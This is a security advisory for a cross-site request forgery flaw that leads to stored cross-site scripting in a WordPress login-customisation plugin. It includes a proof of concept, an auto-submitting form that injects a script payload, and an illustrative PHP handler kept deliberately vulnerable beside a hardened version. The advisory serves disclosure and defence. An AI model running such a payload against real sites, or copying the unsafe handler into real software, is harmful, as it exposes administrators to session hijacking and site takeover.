Erident Custom Login and Dashboard 3.4-3.4.1, Persistent XSS
The Erident Custom Login and Dashboard plugin calls the update_option method whenever a specific POST field is submitted to the plugin's settings screen. No CSRF token (WordPress nonce) is checked, so if an administrative user can be tricked into visiting a site hosting a malicious form, the submitted value is written to the plugin's options unchecked and a Stored Cross-Site Scripting payload is rendered in the admin dashboard through this unsafe method call. The vulnerable method call is located on line 312 of erident-custom-login-and-dashboard/er-custom-login.php.
Homepage
https://wordpress.org/plugins/erident-custom-login-and-dashboard/
CVSS Score
3.5
CVSS Vector
(AV:N/AC:M/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 3.5.
Proof of Concept
<!-- The form's destination belongs in the action attribute; the original used target, which only names a browsing context -->
<form id="form" method="POST" action="http://localhost/wp-admin/options-general.php?page=erident-custom-login-and-dashboard">
<input type="hidden" name="er_options_up[dashboard_data_left]" value="Powered by YourWebsiteName<script>alert(1)</script>"/>
</form>
<!-- Submits automatically when the page is viewed by a logged-in administrator -->
<script>document.getElementById("form").submit();</script>
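As an added illustration (not the plugin's own code), the following shows the shape of the flaw described above beside the hardened handler a maintainer would write for the same settings screen: a nonce bound to the save action, a capability check, an allow-list of option keys, HTML filtering before update_option, and escaping on output. The option name er_demo_options, the nonce action er_demo_save_options and the er_demo_* function names are assumptions; only the POST field er_options_up[dashboard_data_left] comes from the advisory.

```php
<?php
// Illustrative code, not the plugin's own. Names are assumptions (see lead-in).

// Vulnerable shape, as the advisory describes it: whatever arrives in the POST
// field is stored as-is, with no nonce check, no capability check and no filtering.
function er_demo_save_unsafe() {
    if ( isset( $_POST['er_options_up'] ) ) {
        update_option( 'er_demo_options', $_POST['er_options_up'] ); // CSRF + stored XSS
    }
}

// Hardened shape.
function er_demo_save_safe() {
    if ( ! isset( $_POST['er_options_up'] ) ) {
        return;
    }
    // Rejects a forged cross-site request: the nonce must come from er_demo_render_form().
    check_admin_referer( 'er_demo_save_options', 'er_demo_nonce' );
    // Rejects a logged-in user who is not allowed to change site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Only known keys are accepted; unknown keys in the POST array are dropped.
    $allowed = array( 'dashboard_data_left' );
    $clean   = array();
    foreach ( $allowed as $key ) {
        if ( isset( $_POST['er_options_up'][ $key ] ) ) {
            // wp_kses_post keeps ordinary markup but strips <script> tags and event handlers.
            $clean[ $key ] = wp_kses_post( wp_unslash( $_POST['er_options_up'][ $key ] ) );
        }
    }
    update_option( 'er_demo_options', $clean );
}

// The settings form emits the matching nonce field and escapes stored values on output.
function er_demo_render_form() {
    $opts = get_option( 'er_demo_options', array() );
    $left = isset( $opts['dashboard_data_left'] ) ? $opts['dashboard_data_left'] : '';
    echo '<form method="post" action="' . esc_url( admin_url( 'options-general.php?page=er-demo' ) ) . '">';
    wp_nonce_field( 'er_demo_save_options', 'er_demo_nonce' );
    echo '<textarea name="er_options_up[dashboard_data_left]">' . esc_textarea( $left ) . '</textarea>';
    echo '<button type="submit">Save</button></form>';
}
```

With the nonce check in place the advisory's auto-submitting form fails at check_admin_referer, and even a request that carries a valid nonce cannot store a script tag because wp_kses_post removes it.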
Timeline
- 2015-05-11: Discovered
- 2015-05-11: Vendor notified
- 2015-05-11: Vendor responded
- 2015-06-11: Version 3.5 released – issue resolved
- 2015-06-18: Advisory released